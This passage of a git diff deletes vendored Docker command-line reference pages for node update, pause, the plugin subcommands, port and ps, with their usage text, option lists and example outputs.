- -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md deleted file mode 100644 index aa65d0309e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md +++ /dev/null @@ -1,71 +0,0 @@ ---- -title: "node update" -description: "The node update command description and usage" -keywords: "resources, update, dynamically" ---- - - - -## update - -```markdown -Usage: docker node update [OPTIONS] NODE - -Update a node - -Options: - --availability string Availability of the node (active/pause/drain) - --help Print usage - --label-add value Add or update a node label (key=value) (default []) - --label-rm value Remove a node label if exists (default []) - --role string Role of the node (worker/manager) -``` - -### Add label metadata to a node - -Add metadata to a swarm node using node labels. You can specify a node label as -a key with an empty value: - -``` bash -$ docker node update --label-add foo worker1 -``` - -To add multiple labels to a node, pass the `--label-add` flag for each label: - -``` bash -$ docker node update --label-add foo --label-add bar worker1 -``` - -When you [create a service](service_create.md), -you can use node labels as a constraint. A constraint limits the nodes where the -scheduler deploys tasks for a service. - -For example, to add a `type` label to identify nodes where the scheduler should -deploy message queue service tasks: - -``` bash -$ docker node update --label-add type=queue worker1 -``` - -The labels you set for nodes using `docker node update` apply only to the node -entity within the swarm. 
Do not confuse them with the docker daemon labels for -[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels). - -For more information about labels, refer to [apply custom -metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md deleted file mode 100644 index e2dd800d5f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md +++ /dev/null @@ -1,40 +0,0 @@ ---- -title: "pause" -description: "The pause command description and usage" -keywords: "cgroups, container, suspend, SIGSTOP" ---- - - - -# pause - -```markdown -Usage: docker pause CONTAINER [CONTAINER...] - -Pause all processes within one or more containers - -Options: - --help Print usage -``` - -The `docker pause` command suspends all processes in the specified containers. -On Linux, this uses the cgroups freezer. Traditionally, when suspending a process -the `SIGSTOP` signal is used, which is observable by the process being suspended. -With the cgroups freezer the process is unaware, and unable to capture, -that it is being suspended, and subsequently resumed. On Windows, only Hyper-V -containers can be paused. - -See the -[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) -for further details. 
- -## Related information - -* [unpause](unpause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md deleted file mode 100644 index 9d4e99e56a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md +++ /dev/null @@ -1,60 +0,0 @@ ---- -title: "plugin create" -description: "the plugin create command description and usage" -keywords: "plugin, create" ---- - - - -# plugin create - -```markdown -Usage: docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR - -Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory. - -Options: - --compress Compress the context using gzip - --help Print usage -``` - -Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as -[the config.json](../../extend/config.md) - - -The following example shows how to create a sample `plugin`. - -```bash - -$ ls -ls /home/pluginDir - -4 -rw-r--r-- 1 root root 431 Nov 7 01:40 config.json -0 drwxr-xr-x 19 root root 420 Nov 7 01:40 rootfs - -$ docker plugin create plugin /home/pluginDir -plugin - -NAME TAG DESCRIPTION ENABLED -plugin latest A sample plugin for Docker true -``` - -The plugin can subsequently be enabled for local use or pushed to the public registry. 
- -## Related information - -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md deleted file mode 100644 index 451f1ace9c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md +++ /dev/null @@ -1,66 +0,0 @@ ---- -title: "plugin disable" -description: "the plugin disable command description and usage" -keywords: "plugin, disable" ---- - - - -# plugin disable - -```markdown -Usage: docker plugin disable [OPTIONS] PLUGIN - -Disable a plugin - -Options: - -f, --force Force the disable of an active plugin - --help Print usage -``` - -Disables a plugin. The plugin must be installed before it can be disabled, -see [`docker plugin install`](plugin_install.md). Without the `-f` option, -a plugin that has references (eg, volumes, networks) cannot be disabled. 
- - -The following example shows that the `sample-volume-plugin` plugin is installed -and enabled: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -To disable the plugin, use the following command: - -```bash -$ docker plugin disable tiborvass/sample-volume-plugin - -tiborvass/sample-volume-plugin - -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md deleted file mode 100644 index df8bee3af5..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md +++ /dev/null @@ -1,65 +0,0 @@ ---- -title: "plugin enable" -description: "the plugin enable command description and usage" -keywords: "plugin, enable" ---- - - - -# plugin enable - -```markdown -Usage: docker plugin enable [OPTIONS] PLUGIN - -Enable a plugin - -Options: - --help Print usage - --timeout int HTTP client timeout (in seconds) -``` - -Enables a plugin. The plugin must be installed before it can be enabled, -see [`docker plugin install`](plugin_install.md). 
- - -The following example shows that the `sample-volume-plugin` plugin is installed, -but disabled: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker false -``` - -To enable the plugin, use the following command: - -```bash -$ docker plugin enable tiborvass/sample-volume-plugin - -tiborvass/sample-volume-plugin - -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md deleted file mode 100644 index fdcc030c43..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md +++ /dev/null @@ -1,164 +0,0 @@ ---- -title: "plugin inspect" -description: "The plugin inspect command description and usage" -keywords: "plugin, inspect" ---- - - - -# plugin inspect - -```markdown -Usage: docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...] - -Display detailed information on one or more plugins - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -Returns information about a plugin. By default, this command renders all results -in a JSON array. 
- -Example output: - -```bash -$ docker plugin inspect tiborvass/sample-volume-plugin:latest -``` -```JSON -{ - "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21", - "Name": "tiborvass/sample-volume-plugin:latest", - "PluginReference": "tiborvas/sample-volume-plugin:latest", - "Enabled": true, - "Config": { - "Mounts": [ - { - "Name": "", - "Description": "", - "Settable": null, - "Source": "/data", - "Destination": "/data", - "Type": "bind", - "Options": [ - "shared", - "rbind" - ] - }, - { - "Name": "", - "Description": "", - "Settable": null, - "Source": null, - "Destination": "/foobar", - "Type": "tmpfs", - "Options": null - } - ], - "Env": [ - "DEBUG=1" - ], - "Args": null, - "Devices": null - }, - "Manifest": { - "ManifestVersion": "v0", - "Description": "A test plugin for Docker", - "Documentation": "https://docs.docker.com/engine/extend/plugins/", - "Interface": { - "Types": [ - "docker.volumedriver/1.0" - ], - "Socket": "plugins.sock" - }, - "Entrypoint": [ - "plugin-sample-volume-plugin", - "/data" - ], - "Workdir": "", - "User": { - }, - "Network": { - "Type": "host" - }, - "Capabilities": null, - "Mounts": [ - { - "Name": "", - "Description": "", - "Settable": null, - "Source": "/data", - "Destination": "/data", - "Type": "bind", - "Options": [ - "shared", - "rbind" - ] - }, - { - "Name": "", - "Description": "", - "Settable": null, - "Source": null, - "Destination": "/foobar", - "Type": "tmpfs", - "Options": null - } - ], - "Devices": [ - { - "Name": "device", - "Description": "a host device to mount", - "Settable": null, - "Path": "/dev/cpu_dma_latency" - } - ], - "Env": [ - { - "Name": "DEBUG", - "Description": "If set, prints debug messages", - "Settable": null, - "Value": "1" - } - ], - "Args": { - "Name": "args", - "Description": "command line arguments", - "Settable": null, - "Value": [ - - ] - } - } -} -``` -(output formatted for readability) - - -```bash -$ docker plugin inspect -f '{{.Id}}' 
tiborvass/sample-volume-plugin:latest -``` -``` -8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21 -``` - - -## Related information - -* [plugin create](plugin_create.md) -* [plugin enable](plugin_enable.md) -* [plugin disable](plugin_disable.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md deleted file mode 100644 index 0601193ce0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md +++ /dev/null @@ -1,71 +0,0 @@ ---- -title: "plugin install" -description: "the plugin install command description and usage" -keywords: "plugin, install" ---- - - - -# plugin install - -```markdown -Usage: docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...] - -Install a plugin - -Options: - --alias string Local name for plugin - --disable Do not enable the plugin on install - --grant-all-permissions Grant all permissions necessary to run the plugin - --help Print usage -``` - -Installs and enables a plugin. Docker looks first for the plugin on your Docker -host. If the plugin does not exist locally, then the plugin is pulled from -the registry. Note that the minimum required registry version to distribute -plugins is 2.3.0 - - -The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable -`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting -the user to accept the list of privileges that the plugin needs, settings parameters - and enabling the plugin. 
- -```bash -$ docker plugin install vieux/sshfs DEBUG=1 - -Plugin "vieux/sshfs" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -vieux/sshfs -``` - -After the plugin is installed, it appears in the list of plugins: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 vieux/sshfs latest sshFS plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md deleted file mode 100644 index 7a3426d95f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md +++ /dev/null @@ -1,53 +0,0 @@ ---- -title: "plugin ls" -description: "The plugin ls command description and usage" -keywords: "plugin, list" ---- - - - -# plugin ls - -```markdown -Usage: docker plugin ls [OPTIONS] - -List plugins - -Aliases: - ls, list - -Options: - --help Print usage - --no-trunc Don't truncate output -``` - -Lists all the plugins that are currently installed. You can install plugins -using the [`docker plugin install`](plugin_install.md) command. 
- -Example output: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md deleted file mode 100644 index e61d10994c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md +++ /dev/null @@ -1,50 +0,0 @@ ---- -title: "plugin push" -description: "the plugin push command description and usage" -keywords: "plugin, push" ---- - - - -```markdown -Usage: docker plugin push [OPTIONS] PLUGIN[:TAG] - -Push a plugin to a registry - -Options: - --help Print usage -``` - -Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution, -use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one. - -Registry credentials are managed by [docker login](login.md). - -The following example shows how to push a sample `user/plugin`. 
- -```bash - -$ docker plugin ls -ID NAME TAG DESCRIPTION ENABLED -69553ca1d456 user/plugin latest A sample plugin for Docker false -$ docker plugin push user/plugin -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md deleted file mode 100644 index 323ce83f3c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md +++ /dev/null @@ -1,56 +0,0 @@ ---- -title: "plugin rm" -description: "the plugin rm command description and usage" -keywords: "plugin, rm" ---- - - - -# plugin rm - -```markdown -Usage: docker plugin rm [OPTIONS] PLUGIN [PLUGIN...] - -Remove one or more plugins - -Aliases: - rm, remove - -Options: - -f, --force Force the removal of an active plugin - --help Print usage -``` - -Removes a plugin. You cannot remove a plugin if it is enabled, you must disable -a plugin using the [`docker plugin disable`](plugin_disable.md) before removing -it (or use --force, use of force is not recommended, since it can affect -functioning of running containers using the plugin). 
- -The following example disables and removes the `sample-volume-plugin:latest` plugin; - -```bash -$ docker plugin disable tiborvass/sample-volume-plugin -tiborvass/sample-volume-plugin - -$ docker plugin rm tiborvass/sample-volume-plugin:latest -tiborvass/sample-volume-plugin -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md deleted file mode 100644 index c206a8a760..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md +++ /dev/null @@ -1,99 +0,0 @@ ---- -title: "plugin set" -description: "the plugin set command description and usage" -keywords: "plugin, set" ---- - - - -# plugin set - -```markdown -Usage: docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...] - -Change settings for a plugin - -Options: - --help Print usage -``` - -Change settings for a plugin. The plugin must be disabled. - -The settings currently supported are: - * env variables - * source of mounts - * path of devices - * args - -The following example change the env variable `DEBUG` on the -`sample-volume-plugin` plugin. - -```bash -$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin -[DEBUG=0] - -$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1 - -$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin -[DEBUG=1] -``` - -The following example change the source of the `mymount` mount on -the `myplugin` plugin. 
- -```bash -$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin -/foo - -$ docker plugins set myplugin mymount.source=/bar - -$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin -/bar -``` - -Note: since only `source` is settable in `mymount`, `docker plugins set mymount=/bar myplugin` would work too. - -The following example change the path of the `mydevice` device on -the `myplugin` plugin. - -```bash -$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin -/dev/foo - -$ docker plugins set myplugin mydevice.path=/dev/bar - -$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin -/dev/bar -``` - -Note: since only `path` is settable in `mydevice`, `docker plugins set mydevice=/dev/bar myplugin` would work too. - -The following example change the source of the args on the `myplugin` plugin. 
- -```bash -$ docker plugin inspect -f '{{.Settings.Args}}' myplugin -["foo", "bar"] - -$ docker plugins set myplugin args="foo bar baz" - -$ docker plugin inspect -f '{{.Settings.Args}}' myplugin -["foo", "bar", "baz"] -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md deleted file mode 100644 index 20efc577aa..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md +++ /dev/null @@ -1,84 +0,0 @@ ---- -title: "plugin upgrade" -description: "the plugin upgrade command description and usage" -keywords: "plugin, upgrade" ---- - - - -# plugin upgrade - -```markdown -Usage: docker plugin upgrade [OPTIONS] PLUGIN [REMOTE] - -Upgrade a plugin - -Options: - --disable-content-trust Skip image verification (default true) - --grant-all-permissions Grant all permissions necessary to run the plugin - --help Print usage - --skip-remote-check Do not check if specified remote plugin matches existing plugin image -``` - -Upgrades an existing plugin to the specified remote plugin image. If no remote -is specified, Docker will re-pull the current image and use the updated version. -All existing references to the plugin will continue to work. -The plugin must be disabled before running the upgrade. - -The following example installs `vieus/sshfs` plugin, uses it to create and use -a volume, then upgrades the plugin. 
- -```bash -$ docker plugin install vieux/sshfs DEBUG=1 - -Plugin "vieux/sshfs:next" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -vieux/sshfs:next - -$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume -sshvolume -$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello" -$ docker plugin disable -f vieux/sshfs:next -viex/sshfs:next - -# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled -$ docker volume ls -DRIVER VOLUME NAME - -$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next -Plugin "vieux/sshfs:next" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -Upgrade plugin vieux/sshfs:next to vieux/sshfs:next -$ docker plugin enable vieux/sshfs:next -viex/sshfs:next -$ docker volume ls -DRIVER VOLUME NAME -viuex/sshfs:next sshvolume -$ docker run -it -v sshvolume:/data alpine sh -c "ls /data" -hello -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md deleted file mode 100644 index bc90b6e786..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/port.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "port" -description: "The port command description and usage" -keywords: "port, mapping, container" ---- - - - -# port - -```markdown -Usage: docker port CONTAINER [PRIVATE_PORT[/PROTO]] - -List 
port mappings or a specific mapping for the container - -Options: - --help Print usage -``` - -You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or -just a specific mapping: - - $ docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test - $ docker port test - 7890/tcp -> 0.0.0.0:4321 - 9876/tcp -> 0.0.0.0:1234 - $ docker port test 7890/tcp - 0.0.0.0:4321 - $ docker port test 7890/udp - 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test - $ docker port test 7890 - 0.0.0.0:4321 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md deleted file mode 100644 index 1d5f31da88..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md +++ /dev/null @@ -1,384 +0,0 @@ ---- -title: "ps" -description: "The ps command description and usage" -keywords: "container, running, list" ---- - - - -# ps - -```markdown -Usage: docker ps [OPTIONS] - -List containers - -Options: - -a, --all Show all containers (default shows just running) - -f, --filter value Filter output based on conditions provided (default []) - - exited= an exit code of - - label= or label== - - status=(created|restarting|removing|running|paused|exited) - - name= a container's name - - id= a container's ID - - before=(|) - - since=(|) - - ancestor=([:tag]||) - containers created from an image or a descendant. 
- - is-task=(true|false) - - health=(starting|healthy|unhealthy|none) - --format string Pretty-print containers using a Go template - --help Print usage - -n, --last int Show n last created containers (includes all states) (default -1) - -l, --latest Show the latest created container (includes all states) - --no-trunc Don't truncate output - -q, --quiet Only display numeric IDs - -s, --size Display total file sizes -``` - -Running `docker ps --no-trunc` showing 2 linked containers. - -```bash -$ docker ps - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -4c01db0b339c ubuntu:12.04 bash 17 seconds ago Up 16 seconds 3300-3310/tcp webapp -d7886598dbe2 crosbymichael/redis:latest /redis-server --dir 33 minutes ago Up 33 minutes 6379/tcp redis,webapp/db -``` - -The `docker ps` command only shows running containers by default. To see all -containers, use the `-a` (or `--all`) flag: - -```bash -$ docker ps -a -``` - -`docker ps` groups exposed ports into a single range if possible. E.g., a -container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in -the `PORTS` column. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more -than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* id (container's id) -* label (`label=` or `label==`) -* name (container's name) -* exited (int - the code of exited containers. Only useful with `--all`) -* status (created|restarting|running|removing|paused|exited|dead) -* ancestor (`[:]`, `` or ``) - filters containers that were created from the given image or a descendant. -* before (container's id or name) - filters containers created before given id or name -* since (container's id or name) - filters containers created since given id or name -* isolation (default|process|hyperv) (Windows daemon only) -* volume (volume name or mount point) - filters containers that mount volumes. 
-* network (network id or name) - filters containers connected to the provided network -* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status - -#### Label - -The `label` filter matches containers based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches containers with the `color` label regardless of its value. - -```bash -$ docker ps --filter "label=color" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -673394ef1d4c busybox "top" 47 seconds ago Up 45 seconds nostalgic_shockley -d85756f57265 busybox "top" 52 seconds ago Up 51 seconds high_albattani -``` - -The following filter matches containers with the `color` label with the `blue` value. - -```bash -$ docker ps --filter "label=color=blue" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -d85756f57265 busybox "top" About a minute ago Up About a minute high_albattani -``` - -#### Name - -The `name` filter matches on all or part of a container's name. - -The following filter matches all containers with a name containing the `nostalgic_stallman` string. - -```bash -$ docker ps --filter "name=nostalgic_stallman" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9b6247364a03 busybox "top" 2 minutes ago Up 2 minutes nostalgic_stallman -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker ps --filter "name=nostalgic" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -715ebfcee040 busybox "top" 3 seconds ago Up 1 second i_am_nostalgic -9b6247364a03 busybox "top" 7 minutes ago Up 7 minutes nostalgic_stallman -673394ef1d4c busybox "top" 38 minutes ago Up 38 minutes nostalgic_shockley -``` - -#### Exited - -The `exited` filter matches containers by exist status code. 
For example, to -filter for containers that have exited successfully: - -```bash -$ docker ps -a --filter 'exited=0' - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -ea09c3c82f6e registry:latest /srv/run.sh 2 weeks ago Exited (0) 2 weeks ago 127.0.0.1:5000->5000/tcp desperate_leakey -106ea823fe4e fedora:latest /bin/sh -c 'bash -l' 2 weeks ago Exited (0) 2 weeks ago determined_albattani -48ee228c9464 fedora:20 bash 2 weeks ago Exited (0) 2 weeks ago tender_torvalds -``` - -#### Killed containers - -You can use a filter to locate containers that exited with status of `137` -meaning a `SIGKILL(9)` killed them. - -```bash -$ docker ps -a --filter 'exited=137' -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -b3e1c0ed5bfe ubuntu:latest "sleep 1000" 12 seconds ago Exited (137) 5 seconds ago grave_kowalevski -a2eb5558d669 redis:latest "/entrypoint.sh redi 2 hours ago Exited (137) 2 hours ago sharp_lalande -``` - -Any of these events result in a `137` status: - -* the `init` process of the container is killed manually -* `docker kill` kills the container -* Docker daemon restarts which kills all running containers - -#### Status - -The `status` filter matches containers by status. You can filter using -`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. 
For example, -to filter for `running` containers: - -```bash -$ docker ps --filter status=running - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -715ebfcee040 busybox "top" 16 minutes ago Up 16 minutes i_am_nostalgic -d5c976d3c462 busybox "top" 23 minutes ago Up 23 minutes top -9b6247364a03 busybox "top" 24 minutes ago Up 24 minutes nostalgic_stallman -``` - -To filter for `paused` containers: - -```bash -$ docker ps --filter status=paused - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -673394ef1d4c busybox "top" About an hour ago Up About an hour (Paused) nostalgic_shockley -``` - -#### Ancestor - -The `ancestor` filter matches containers based on its image or a descendant of -it. The filter supports the following image representation: - -- image -- image:tag -- image:tag@digest -- short-id -- full-id - -If you don't specify a `tag`, the `latest` tag is used. For example, to filter -for containers that use the latest `ubuntu` image: - -```bash -$ docker ps --filter ancestor=ubuntu - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace -5d1e4a540723 ubuntu-c2 "top" About a minute ago Up About a minute admiring_sammet -82a598284012 ubuntu "top" 3 minutes ago Up 3 minutes sleepy_bose -bab2a34ba363 ubuntu "top" 3 minutes ago Up 3 minutes focused_yonath -``` - -Match containers based on the `ubuntu-c1` image which, in this case, is a child -of `ubuntu`: - -```bash -$ docker ps --filter ancestor=ubuntu-c1 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace -``` - -Match containers based on the `ubuntu` version `12.04.5` image: - -```bash -$ docker ps --filter ancestor=ubuntu:12.04.5 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose -``` - -The following matches containers based on the layer 
`d0e008c6cf02` or an image -that have this layer in its layer stack. - -```bash -$ docker ps --filter ancestor=d0e008c6cf02 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose -``` - -#### Before - -The `before` filter shows only containers created before the container with -given id or name. For example, having these containers created: - -```bash -$ docker ps - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9c3527ed70ce busybox "top" 14 seconds ago Up 15 seconds desperate_dubinsky -4aace5031105 busybox "top" 48 seconds ago Up 49 seconds focused_hamilton -6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat -``` - -Filtering with `before` would give: - -```bash -$ docker ps -f before=9c3527ed70ce - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -4aace5031105 busybox "top" About a minute ago Up About a minute focused_hamilton -6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat -``` - -#### Since - -The `since` filter shows only containers created since the container with given -id or name. 
